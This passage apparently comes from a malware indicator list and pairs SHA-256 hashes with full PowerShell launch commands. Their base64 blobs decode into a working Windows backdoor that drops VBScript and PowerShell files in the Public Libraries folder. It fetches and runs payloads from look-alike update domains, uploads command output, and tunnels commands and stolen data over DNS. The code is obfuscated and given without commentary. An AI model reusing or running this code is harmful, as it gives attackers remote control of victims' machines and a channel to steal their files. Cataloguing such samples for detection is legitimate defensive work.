ogICAgICAgIEZpeEJhdEZpbGUgKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrIi5iYXQiKQogICAgfQogICAgJHJldAp9CmZ1bmN0aW9uIFNlbmRSZWNlaXZlRE5TICgkZCkKewoJJGNudCA9IDAKCXdoaWxlICgkY250IC1sdCAyMCkKCXsKCQl0cnkKCQl7CgkJCSRteWRhdGEgPSAoW1N5c3RlbS5OZXQuRE5TXTo6R2V0SG9zdEJ5TmFtZSgkZCskZ2xvYmFsOm15aG9zdCkuQWRkcmVzc0xpc3RbMF0pDQoJCQkkbXlkYXRhID0gKCRteWRhdGEgfCBGb3JFYWNoLU9iamVjdCB7JF8uSVBBZGRyZXNzVG9TdHJpbmd9KQoJCQkkY250ID0gMjUKCQl9CgkJY2F0Y2gKCQl7CgkJCVN0YXJ0LVNsZWVwIC1tIDUwMAoJCQkkY250KysKCQl9Cgl9CiAgICBpZigtbm90KCRjbnQgLWVxIDI1KSkKICAgIHsKICAgICAgICAoJyMnKycjIycpCiAgICB9CiAgICBlbHNlaWYoJGdsb2JhbDpteWZsYWcgLWVxIDAgLWFuZCAkbXlkYXRhLlN0YXJ0c1dpdGgoJzMzLjMzLicpKQogICAgewogICAgICAgICR0bXAgPSAkbXlkYXRhLlN1YlN0cmluZyg2KS5TcGxpdCgnLicpCiAgICAgICAgJGdsb2JhbDpmaWxlbmFtZSA9IChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pCiAgICAgICAgJGdsb2JhbDpteWZsYWcgPSAxCiAgICB9CiAgICBlbHNlaWYgKCRteWRhdGEuRXF1YWxzKCczNS4zNS4zNS4zNScpKQogICAgewogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMAogICAgfQogICAgZWxzZWlmICgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkKICAgIHsKICAgICAgICAkdG1wID0gJG15ZGF0YS5TcGxpdCgnLicpCiAgICAgICAgW1N5c3RlbS5JTy5GaWxlXTo6QXBwZW5kQWxsVGV4dCgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKyIuYmF0IiwgKChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzJdKSArIChbY2hhcl0gW2ludF0gJHRtcFszXSkpKQogICAgfQogICAgZWxzZWlmKCRnbG9iYWw6bXlpZCAtZXEgJyMnKycjIycpCiAgICB7CiAgICAgICAgKFtjaGFyXSBbaW50XSAkbXlkYXRhLlNwbGl0KCcuJylbMF0pCiAgICB9Cn0KZnVuY3Rpb24gRml4QmF0RmlsZSAoJGJhdHBhdGgpCnsKICAgIChHZXQtQ29udGVudCAkYmF0cGF0aCkuU3Vic3RyaW5nKDEwKSB8IFNldC1Db250ZW50ICRiYXRwYXRoCn0KZnVuY3Rpb24gU2VuZEZpbGUoJG15RmlsZVBhdGgpCnsKICAgICRteUZpbGVOYW1lID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0RmlsZU5hbWVXaXRob3V0RXh0ZW5zaW9uKCRteUZpbGVQYXRoKQogICAgJG15c3RyID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbFRleHQoJG15RmlsZVBhdGgpCiAgICAkaT0wCiAgICAkbXl0ZW1wID0gJycKICAgICRqPTAKICAgIHdoaWxlKCRpIC1sZSAkbXlzdHIuTGVuZ3RoKQogICAgewogICAgICAgICRteXRlbXAgKz0gJG15c3RyWyRpXQogICAgICAgIGlmKCgoJGklMjQpIC1lcSAyMykgLW9yICgkaSAtZXEgJG15c3RyLkxlbmd0aCkpCiAgICAgICAgewogICAgICAgICAgICAkbXloZXggPSBTdHIySGV4ICRteXRlbXAKICAgICAgICAgICAgU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMiAkbXlGaWxlTmFtZSAoY29udmVydFRvLUJhc2UzNiAkaikpICsgJG15aGV4KQogICAgICAgICAgICAkaisrCiAgICAgICAgICAgICRteXRlbXAgPSAnJwogICAgICAgIH0KICAgICAgICAkaSsrCiAgICB9Cn0KZnVuY3Rpb24gR2V0SUQKewogICAgJGdsb2JhbDpteWlkID0gU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMCkrJzMwJykKfQpmdW5jdGlvbiBDaGFuZ2VUaGlzRmlsZSAoJGJvdGlkKQp7CgkoR2V0LUNvbnRlbnQgJGVudjpQdWJsaWNcTGlicmFyaWVzXGRucy5wczEpIC1yZXBsYWNlICgnIycrJyMjJyksJGJvdGlkIHwgU2V0LUNvbnRlbnQgJGVudjpQdWJsaWNcTGlicmFyaWVzXGRucy5wczEKfQpmdW5jdGlvbiBJbml0CnsKICAgIGlmKCRnbG9iYWw6bXlpZCAtZXEgKCcjJysnIyMnKSkKICAgIHsKCQltZCAtRm9yY2UgKCRnbG9iYWw6bXlob21lKyd0cFwnKQoJCUdldElECgkJQ2hhbmdlVGhpc0ZpbGUgJGdsb2JhbDpteWlkCiAgICB9Cn0KZnVuY3Rpb24gbWFpbgp7CiAgICBJbml0CiAgICBpZihBbGl2ZSAtZXEgMSkKICAgIHsKICAgICAgICBJbnZva2UtRXhwcmVzc2lvbiAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLmJhdCA+ICcrJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICAgICAgU2VuZEZpbGUgKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKQogICAgICAgIFJlbW92ZS1JdGVtICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycuYmF0JykKICAgICAgICBSZW1vdmUtSXRlbSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICB9Cn0KbWFpbg0K')); Add-Content 'C:\Users\Public\Libraries\dns.ps1' $f;(Get-Content $env:Public\Libraries\update.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\update.vbs}" --> HOME="%public%\Libraries\"SERVER="http://winodwsupdates.me/counter.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_'); Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte; Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring($wc.ResponseHeaders['Content-Disposition'].IndexOf('filename=')+9))}catch{break}}}"""CreateObject("W__Script.S__hell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_'); Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte; Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_'); Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring($wc.ResponseHeaders['Content-Disposition'].IndexOf('filename=')+9)+'.txt'); Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String((Get-Content -Path $_.FullName -Encoding Byte)) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("W__Script.S__hell").Run Replace(DownloadExecute,"-_","bat"),0DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"dns.ps1"CreateObject("W__Script.S__hell").Run DnsCmd,0
  24. 9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777
  25. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXCINClNFUlZFUj0iaHR0cDovL2dvb2dsZXVwZGF0ZS5kb3dubG9hZC91cGRhdGUtaW5kZXguYXNweD9yZXE9X19cIg0KRHduPSJwb3dlcnNoZWxsICIiJnskd2M9KG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpOyR3Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHM9JHRydWU7JHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTskd2MuSGVhZGVycy5hZGQoJ1VzZXItQWdlbnQnLCdNaWNyb3NvZnQgQklUUy83LjcnKTt3aGlsZSgxKXt0cnl7JHI9R2V0LVJhbmRvbTskd2MuRG93bmxvYWRGaWxlKCciJlNFUlZFUiYiLV8mbT1kJywnIiZIT01FJiJkblwnKyRyKycuLV8nKTtTZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLVZhbHVlIChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChHZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykpKSkgLUVuY29kaW5nIEJ5dGU7JGNkPSR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXTtSZW5hbWUtSXRlbSAtcGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLW5ld25hbWUgKCRjZC5TdWJzdHJpbmcoJGNkLkluZGV4T2YoJ2ZpbGVuYW1lPScpKzkpKX1jYXRjaHticmVha319fSIiIg0KQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuIFJlcGxhY2UoRHduLCItXyIsImR3biIpLDANCkRvd25sb2FkRXhlY3V0ZT0icG93ZXJzaGVsbCAiIiZ7JHdjPShuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KTskd2MuVXNlRGVmYXVsdENyZWRlbnRpYWxzPSR0cnVlOyR3Yy5IZWFkZXJzLmFkZCgnQWNjZXB0JywnKi8qJyk7JHdjLkhlYWRlcnMuYWRkKCdVc2VyLUFnZW50JywnTWljcm9zb2Z0IEJJVFMvNy43Jyk7JHI9R2V0LVJhbmRvbTskd2MuRG93bmxvYWRGaWxlKCciJlNFUlZFUiYiLV8mbT1kJywnIiZIT01FJiJkblwnKyRyKycuLV8nKTtTZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLVZhbHVlIChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChHZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykpKSkgLUVuY29kaW5nIEJ5dGU7SW52b2tlLUV4cHJlc3Npb24gKCciJkhPTUUmImRuXCcrJHIrJy4tXyA+IiZIT01FJiJ1cFwnKyRyKyctXycpOyRjZD0kd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LURpc3Bvc2l0aW9uJ107UmVuYW1lLUl0ZW0gLXBhdGggKCciJkhPTUUmInVwXCcrJHIrJy1fJykgLW5ld25hbWUgKCRjZC5TdWJzdHJpbmcoKCRjZC5JbmRleE9mKCdmaWxlbmFtZT0nKSs5KSwoJGNkLkxlbmd0aC0yNSkpKycuYmF0LnR4dCcpO0dldC1DaGlsZEl0ZW0gIiZIT01FJiJ1cFwgfCBGb3JFYWNoLU9iamVjdCB7aWYoKEdldC1JdGVtICgkXy5GdWxsTmFtZSkpLmxlbmd0aCAtZ3QgMCl7W1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoKFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxCeXRlcygkXy5GdWxsTmFtZSkpKSB8IE91dC1GaWxlICRfLkZ1bGxOYW1lOyR3Yy5VcGxvYWRGaWxlKCciJlNFUlZFUiYidXBsJm09dScsJF8uRnVsbE5hbWUpO3dhaXRmb3IgaGFoYSAvVCAzfTtSZW1vdmUtSXRlbSAkXy5GdWxsTmFtZX07UmVtb3ZlLUl0ZW0gKCciJkhPTUUmImRuXCcrJHIrJy4tXycpfSIiIg0KQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuIFJlcGxhY2UoRG93bmxvYWRFeGVjdXRlLCItXyIsImJhdCIpLDANCkRuc0NtZD0icG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSAiJkhPTUUmImZpcmVleWUucHMxIg0KQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuIERuc0NtZCww')); Set-Content 'C:\Users\Public\Libraries\fireeye.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLmdvb2dsZXVwZGF0ZS5kb3dubG9hZCcKJGdsb2JhbDpmaWxlbmFtZSA9ICcnCiRnbG9iYWw6bXlmbGFnID0gMAokZ2xvYmFsOm15aWQgPSAnIyMjJwokZ2xvYmFsOm15aG9tZSA9ICIkZW52OlB1YmxpY1xMaWJyYXJpZXNcIgpmdW5jdGlvbiBjb252ZXJ0VG8tQmFzZTM2ICgkZGVjTnVtPSIiKQp7CiAgICAkZGVjTnVtICU9IDQ2NjU2CiAgICAkYWxwaGFiZXQgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIgogICAgZG8KICAgIHsKICAgICAgICAkcmVtYWluZGVyID0gKCRkZWNOdW0gJSAzNikKICAgICAgICAkY2hhciA9ICRhbHBoYWJldC5zdWJzdHJpbmcoJHJlbWFpbmRlciwxKQogICAgICAgICRiYXNlMzZOdW0gPSAiJGNoYXIkYmFzZTM2TnVtIgogICAgICAgICRkZWNOdW0gPSAoJGRlY051bSAtICRyZW1haW5kZXIpIC8gMzYKICAgIH0KICAgIHdoaWxlICgkZGVjTnVtIC1ndCAwKQogICAgJGJhc2UzNk51bS5QYWRMZWZ0KDMsJzAnKQp9CmZ1bmN0aW9uIEdldFN1YigkbXlmbGFnMiwgJGNtZGlkPScwMCcsICRwYXJ0aWQ9JzAwMCcpCnsKICAgIGlmKCRteWZsYWcyIC1lcSAwKQogICAgewogICAgKCd3dzAwMDAwMCcrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKQogICAgfQogICAgZWxzZWlmKCRteWZsYWcyIC1lcSAxKQogICAgewogICAgICAgICgnd3cnKyRnbG9iYWw6bXlpZCsnMDAwMDAnKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkKICAgIH0KICAgIGVsc2VpZigkbXlmbGFnMiAtZXEgMikKICAgIHsKICAgICAgICAoJ3d3JyskZ2xvYmFsOm15aWQrJGNtZGlkKyRwYXJ0aWQrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKQogICAgfQp9CmZ1bmN0aW9uIFN0cjJIZXgoJG15c3RyKQp7CiAgICBbU3lzdGVtLkJpdENvbnZlcnRlcl06OlRvU3RyaW5nKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkRlZmF1bHQuR2V0Qnl0ZXMoJG15c3RyKSkuUmVwbGFjZSgiLSIsICIiKQp9CmZ1bmN0aW9uIEFsaXZlCnsKCWlmKCRnbG9iYWw6bXlpZCAtZXEgJyMnKycjIycpCgl7CgkJcmV0dXJuIDAKCX0KICAgIFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDEpKyczMCcpCiAgICAkc3ViID0gKChHZXRTdWIgMSkrJzIzMkEnKSArIChTdHIySGV4ICRnbG9iYWw6ZmlsZW5hbWUpCiAgICAkaSA9IDEKICAgICRyZXQgPSAwCiAgICB3aGlsZSgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkKICAgIHsKICAgICAgICAkcmV0ID0gMQogICAgICAgICRzdWIyID0gJHN1YiArIChTdHIySGV4ICRpKQogICAgICAgIFNlbmRSZWNlaXZlRE5TICRzdWIyCiAgICAgICAgJGkrKwogICAgfQogICAgaWYoJHJldCAtZXEgMSkKICAgIHsKICAgICAgICBGaXhCYXRGaWxlICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKyIuYmF0IikKICAgIH0KICAgICRyZXQKfQpmdW5jdGlvbiBTZW5kUmVjZWl2ZUROUyAoJGQpCnsKCSRjbnQgPSAwCgl3aGlsZSAoJGNudCAtbHQgMjApCgl7CgkJdHJ5CgkJewoJCQkkbXlkYXRhID0gKFtTeXN0ZW0uTmV0LkROU106OkdldEhvc3RCeU5hbWUoJGQrJGdsb2JhbDpteWhvc3QpLkFkZHJlc3NMaXN0WzBdKQoJCQkkbXlkYXRhID0gKCRteWRhdGEgfCBGb3JFYWNoLU9iamVjdCB7JF8uSVBBZGRyZXNzVG9TdHJpbmd9KQoJCQkkY250ID0gMjUKCQl9CgkJY2F0Y2gKCQl7CgkJCVN0YXJ0LVNsZWVwIC1tIDUwMAoJCQkkY250KysKCQl9Cgl9CiAgICBpZigtbm90KCRjbnQgLWVxIDI1KSkKICAgIHsKICAgICAgICAoJyMnKycjIycpCiAgICB9CiAgICBlbHNlaWYoJGdsb2JhbDpteWZsYWcgLWVxIDAgLWFuZCAkbXlkYXRhLlN0YXJ0c1dpdGgoJzMzLjMzLicpKQogICAgewogICAgICAgICR0bXAgPSAkbXlkYXRhLlN1YlN0cmluZyg2KS5TcGxpdCgnLicpCiAgICAgICAgJGdsb2JhbDpmaWxlbmFtZSA9IChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pCiAgICAgICAgJGdsb2JhbDpteWZsYWcgPSAxCiAgICB9CiAgICBlbHNlaWYgKCRteWRhdGEuRXF1YWxzKCczNS4zNS4zNS4zNScpKQogICAgewogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMAogICAgfQogICAgZWxzZWlmICgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkKICAgIHsKICAgICAgICAkdG1wID0gJG15ZGF0YS5TcGxpdCgnLicpCiAgICAgICAgW1N5c3RlbS5JTy5GaWxlXTo6QXBwZW5kQWxsVGV4dCgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKyIuYmF0IiwgKChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzJdKSArIChbY2hhcl0gW2ludF0gJHRtcFszXSkpKQogICAgfQogICAgZWxzZWlmKCRnbG9iYWw6bXlpZCAtZXEgJyMnKycjIycpCiAgICB7CiAgICAgICAgKFtjaGFyXSBbaW50XSAkbXlkYXRhLlNwbGl0KCcuJylbMF0pCiAgICB9Cn0KZnVuY3Rpb24gRml4QmF0RmlsZSAoJGJhdHBhdGgpCnsKICAgIChHZXQtQ29udGVudCAkYmF0cGF0aCkuU3Vic3RyaW5nKDEwKSB8IFNldC1Db250ZW50ICRiYXRwYXRoCn0KZnVuY3Rpb24gU2VuZEZpbGUoJG15RmlsZVBhdGgpCnsKICAgICRteUZpbGVOYW1lID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0RmlsZU5hbWVXaXRob3V0RXh0ZW5zaW9uKCRteUZpbGVQYXRoKQogICAgJG15c3RyID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbFRleHQoJG15RmlsZVBhdGgpCiAgICAkaT0wCiAgICAkbXl0ZW1wID0gJycKICAgICRqPTAKICAgIHdoaWxlKCRpIC1sZSAkbXlzdHIuTGVuZ3RoKQogICAgewogICAgICAgICRteXRlbXAgKz0gJG15c3RyWyRpXQogICAgICAgIGlmKCgoJGklMjQpIC1lcSAyMykgLW9yICgkaSAtZXEgJG15c3RyLkxlbmd0aCkpCiAgICAgICAgewogICAgICAgICAgICAkbXloZXggPSBTdHIySGV4ICRteXRlbXAKICAgICAgICAgICAgU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMiAkbXlGaWxlTmFtZSAoY29udmVydFRvLUJhc2UzNiAkaikpICsgJG15aGV4KQogICAgICAgICAgICAkaisrCiAgICAgICAgICAgICRteXRlbXAgPSAnJwogICAgICAgIH0KICAgICAgICAkaSsrCiAgICB9Cn0KZnVuY3Rpb24gR2V0SUQKewogICAgJGdsb2JhbDpteWlkID0gU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMCkrJzMwJykKfQpmdW5jdGlvbiBDaGFuZ2VUaGlzRmlsZSAoJGJvdGlkKQp7CgkoR2V0LUNvbnRlbnQgJGVudjpQdWJsaWNcTGlicmFyaWVzXGZpcmVleWUucHMxKSAtcmVwbGFjZSAoJyMnKycjIycpLCRib3RpZCB8IFNldC1Db250ZW50ICRlbnY6UHVibGljXExpYnJhcmllc1xmaXJlZXllLnBzMQp9CmZ1bmN0aW9uIEluaXQKewogICAgaWYoJGdsb2JhbDpteWlkIC1lcSAoJyMnKycjIycpKQogICAgewoJCW1kIC1Gb3JjZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcpCgkJR2V0SUQKCQlDaGFuZ2VUaGlzRmlsZSAkZ2xvYmFsOm15aWQKICAgIH0KfQpmdW5jdGlvbiBtYWluCnsKICAgIEluaXQKICAgIGlmKEFsaXZlIC1lcSAxKQogICAgewogICAgICAgIEludm9rZS1FeHByZXNzaW9uICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycuYmF0ID4gJyskZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycudHh0JykKICAgICAgICBTZW5kRmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQnKQogICAgICAgIFJlbW92ZS1JdGVtICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycudHh0JykKICAgIH0KfQptYWlu')); Set-Content 'C:\Users\Public\Libraries\fireeye.ps1' $f;(Get-Content $env:Public\Libraries\fireeye.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\fireeye.vbs}" --> HOME="%public%\Libraries\"SERVER="http://googleupdate.download/update-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("W__Script.S__hell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($cd.Substring(($cd.IndexOf('filename=')+9),($cd.Length-25))+'.bat.txt');Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($_.FullName))) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("W__Script.S__hell").Run Replace(DownloadExecute,"-_","bat"),0DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"fireeye.ps1"CreateObject("W__Script.S__hell").Run DnsCmd,0
  26. bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9
  27. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXCINClNFUlZFUj0iaHR0cDovL2dvb2dsZXVwZGF0ZS5kb3dubG9hZC91cGRhdGUtaW5kZXguYXNweD9yZXE9X19cIg0KRHduPSJwb3dlcnNoZWxsICIiJnskd2M9KG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpOyR3Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHM9JHRydWU7JHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTskd2MuSGVhZGVycy5hZGQoJ1VzZXItQWdlbnQnLCdNaWNyb3NvZnQgQklUUy83LjcnKTt3aGlsZSgxKXt0cnl7JHI9R2V0LVJhbmRvbTskd2MuRG93bmxvYWRGaWxlKCciJlNFUlZFUiYiLV8mbT1kJywnIiZIT01FJiJkblwnKyRyKycuLV8nKTtTZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLVZhbHVlIChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChHZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykpKSkgLUVuY29kaW5nIEJ5dGU7JGNkPSR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXTtSZW5hbWUtSXRlbSAtcGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLW5ld25hbWUgKCRjZC5TdWJzdHJpbmcoJGNkLkluZGV4T2YoJ2ZpbGVuYW1lPScpKzkpKX1jYXRjaHticmVha319fSIiIg0KQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuIFJlcGxhY2UoRHduLCItXyIsImR3biIpLDANCkRvd25sb2FkRXhlY3V0ZT0icG93ZXJzaGVsbCAiIiZ7JHdjPShuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KTskd2MuVXNlRGVmYXVsdENyZWRlbnRpYWxzPSR0cnVlOyR3Yy5IZWFkZXJzLmFkZCgnQWNjZXB0JywnKi8qJyk7JHdjLkhlYWRlcnMuYWRkKCdVc2VyLUFnZW50JywnTWljcm9zb2Z0IEJJVFMvNy43Jyk7JHI9R2V0LVJhbmRvbTskd2MuRG93bmxvYWRGaWxlKCciJlNFUlZFUiYiLV8mbT1kJywnIiZIT01FJiJkblwnKyRyKycuLV8nKTtTZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykgLVZhbHVlIChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChHZXQtQ29udGVudCAtUGF0aCAoJyImSE9NRSYiZG5cJyskcisnLi1fJykpKSkgLUVuY29kaW5nIEJ5dGU7SW52b2tlLUV4cHJlc3Npb24gKCciJkhPTUUmImRuXCcrJHIrJy4tXyA+IiZIT01FJiJ1cFwnKyRyKyctXycpOyRjZD0kd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LURpc3Bvc2l0aW9uJ107UmVuYW1lLUl0ZW0gLXBhdGggKCciJkhPTUUmInVwXCcrJHIrJy1fJykgLW5ld25hbWUgKCRjZC5TdWJzdHJpbmcoKCRjZC5JbmRleE9mKCdmaWxlbmFtZT0nKSs5KSwoJGNkLkxlbmd0aC0yNSkpKycuYmF0LnR4dCcpO0dldC1DaGlsZEl0ZW0gIiZIT01FJiJ1cFwgfCBGb3JFYWNoLU9iamVjdCB7aWYoKEdldC1JdGVtICgkXy5GdWxsTmFtZSkpLmxlbmd0aCAtZ3QgMCl7W1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoKFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxCeXRlcygkXy5GdWxsTmFtZSkpKSB8IE91dC1GaWxlICRfLkZ1bGxOYW1lOyR3Yy5VcGxvYWRGaWxlKCciJlNFUlZFUiYidXBsJm09dScsJF8uRnVsbE5hbWUpO3dhaXRmb3IgaGFoYSAvVCAzfTtSZW1vdmUtSXRlbSAkXy5GdWxsTmFtZX07UmVtb3ZlLUl0ZW0gKCciJkh